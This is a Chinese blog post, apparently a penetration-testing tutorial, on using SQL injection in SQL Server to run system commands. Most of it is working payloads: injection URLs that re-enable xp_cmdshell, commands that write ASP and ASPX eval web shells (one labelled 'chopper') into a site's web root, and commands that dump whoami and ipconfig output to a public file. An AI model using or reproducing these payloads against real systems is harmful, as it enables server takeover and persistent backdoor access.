欢迎来到【血梦博客】 今天是:2021年03月08日 星期一
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:sqlserver执行系统命令

WEB安全之SQL注入:sqlserver执行系统命令

作者:血梦 日期:2020-03-18 浏览:254分类: 渗透测试 已提交百度收录

在SQLSERVER中是可以执行多行操作的


两条SQL语句是用分号隔开

select * from art; select * from admin


xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。

如果用户拥有管理员sa权限则可以用sp_configure 重新开启它。

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

1.jpg
命令解释
EXEC sp_configure 'show advancedoptions',1//允许修改高级参数

RECONFIGUREEXEC sp_configure'xp_cmdshell',1  //打开xp_cmdshell扩展RECONFIGURE

执行系统命令
EXEC master.dbo.xp_cmdshell 'ipconfig'


开始xp_cmdshell

http://www.demo1.com/index.aspx?id=1;EXECsp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;



getshell

http://www.demo1.com/index.aspx?id=1;execmaster..xp_cmdshell 'echo ^<%eval request(chr(35))%^> >C:\inetpub\wwwroot\www.demo1.com\2.asp' --
exec master..xp_cmdshell 'echo ^<%evalrequest(chr(35))%^> > C:\inetpub\wwwroot\www.demo1.com\2.asp'--
exec master..xp_cmdshell 'echo ^<%@ PageLanguage="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>D:\2.aspx'–
http://www.demo1.com/index.aspx?id=1;execmaster..xp_cmdshell 'echo ^<%@ PageLanguage="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>C:\inetpub\wwwroot\www.demo1.com\2.aspx'–

执行系统命令 把命令结果输出到指定文件

http://www.demo1.com/index.aspx?id=1;EXECmaster.dbo.xp_cmdshell 'ipconfig>>C:\inetpub\wwwroot\www.demo1.com\ip.txt'
http://www.demo1.com/index.aspx?id=1;EXECmaster.dbo.xp_cmdshell 'whoami >>C:\inetpub\wwwroot\www.demo1.com\ip.txt'


关灯